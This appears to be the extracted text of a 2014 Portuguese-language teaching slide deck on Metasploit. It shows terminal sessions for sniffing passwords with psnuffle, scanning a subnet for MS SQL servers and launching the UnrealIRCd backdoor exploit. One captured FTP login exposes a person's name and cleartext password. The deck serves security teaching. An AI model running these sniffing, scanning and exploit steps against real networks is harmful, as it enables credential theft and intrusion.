Metasploit 2 Cerutti-IES 2014 Seja periódico e Consistente. Em tudo, pela vida toda. Principalmente nas questões relativas a segurança Seja periódico e Consistente. Em tudo, pela vida toda. Principalmente nas questões relativas a segurança
O Que caracteriza um bom Framework?
frameworks
SQL Microsoft
Cargas disponíveis
Saindo (descarregando) módulos Comando=back:
Password Sniffing > use auxiliary/sniffer/psnuffle msf > use auxiliary/sniffer/psnuffle msf auxiliary(psnuffle) > run [*] Auxiliary module execution completed [*] Loaded protocol FTP from /opt/metasploit/apps/pro/msf3/data/exploits/psnuffle/ftp.rb... [*] Loaded protocol IMAP from /opt/metasploit/apps/pro/msf3/data/exploits/psnuffle/imap.rb... [*] Loaded protocol POP3 from /opt/metasploit/apps/pro/msf3/data/exploits/psnuffle/pop3.rb... [*] Loaded protocol SMB from /opt/metasploit/apps/pro/msf3/data/exploits/psnuffle/smb.rb... msf auxiliary(psnuffle) > [*] Loaded protocol URL from /opt/metasploit/apps/pro/msf3/data/exploits/psnuffle/url.rb... [*] Sniffing traffic..... host_int= &ns_map= _ %2C _ &user_id= &nid= &ts= [*] Failed FTP Login: : :21 >> fernandocerutti / baguinha
[*] HTTP GET: : : %2C _ &user_id= &nid= &ts= [*] Successful FTP Login: : :21 >> anonymous / [*] HTTP GET: : : %2C _ &user_id= &nid= &ts= [*] Successful FTP Login: : :21 >> anonymous / caraca
http sem segurança- em texto plano [*] HTTP GET: : :80 analytics.com/__utm.gif?utmwv=5.6.0&utms=7&utmn= &utmhn= deshare.net&utmt =event&utme=5(search_content*search_pageload*Description %20HL%20Percentage)(216)8(member_type)9(FREE)11(1)&utmcs=UTF- 8&utmsr=1280x800&utmvp=1091x648&utmsc=24-bit&utmul=en- us&utmje=1&utmfl=15.0%20r0&utmdt=%27 metasploit %27%20on%20SlideShare&ut mhid= &utmr=0&utmp=%2Fsearch%2Fslideshow%3Fsearchfrom%3Dheader %26q%3Dmetasploit&utmht= &utmac=UA &utmcc=__utma%3D %3B%2B__utmz%3D utmcsr%3Dgoogle%7Cutmccn%3D(or ganic)%7Cutmcmd%3Dorganic%7Cutmctr%3D(not%2520provided)%3B%2B__utmv%3D member%3B&utmjid=&utmu=6RAAACAAAAAAAAAAAAAAAAAE~ [*] HTTP GET: : :80 E5saE0q8AysNEyZiXdMtJwzLZrrD-93ly2lmHo0qH_eNWClKa8vX-zMT3w
sniff ] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80
Ms SQL msf > nmap -sU /24 -p1434 [*] exec: nmap -sU /24 -p1434 Starting Nmap 6.46 ( ) at :26 PST Nmap scan report for Host is up (0.049s latency). PORT STATE SERVICE 1434/udp open|filtered ms-sql-m MAC Address: 84:C9:B2:55:A7:03 (D-Link International) Nmap scan report for Host is up (0.0053s latency). PORT STATE SERVICE 1434/udp closed ms-sql-m MAC Address: 00:0C:29:6F:8D:07 (VMware) Nmap scan report for Host is up (0.17s latency). PORT STATE SERVICE 1434/udp open|filtered ms-sql-m MAC Address: 64:6C:B2:4E:62:B3 (Samsung Electronics Co.)
msf > use scanner/mssql/mssql_ping msf auxiliary(mssql_ping) > set RHOSTS /24 RHOSTS => /24 msf auxiliary(mssql_ping) > set THREADS 20 THREADS => 20 msf auxiliary(mssql_ping) > exploit [*] Scanned 026 of 256 hosts (010% complete) [*] Scanned 052 of 256 hosts (020% complete) [*] Scanned 079 of 256 hosts (030% complete) [*] Scanned 104 of 256 hosts (040% complete) [*] Scanned 141 of 256 hosts (055% complete) [*] Scanned 154 of 256 hosts (060% complete) [*] Scanned 182 of 256 hosts (071% complete) [*] Scanned 206 of 256 hosts (080% complete) [*] Scanned 244 of 256 hosts (095% complete) [*] Scanned 256 of 256 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(mssql_ping) >
Backdoor no linux use exploit/unix/irc/unreal_ircd_3281_backdoor msf exploit(unreal_ircd_3281_backdoor) > msf exploit(unreal_ircd_3281_backdoor) > set RHOST RHOST => msf exploit(unreal_ircd_3281_backdoor) > exploit
Saida exploit backdoor
Dotdefender Wget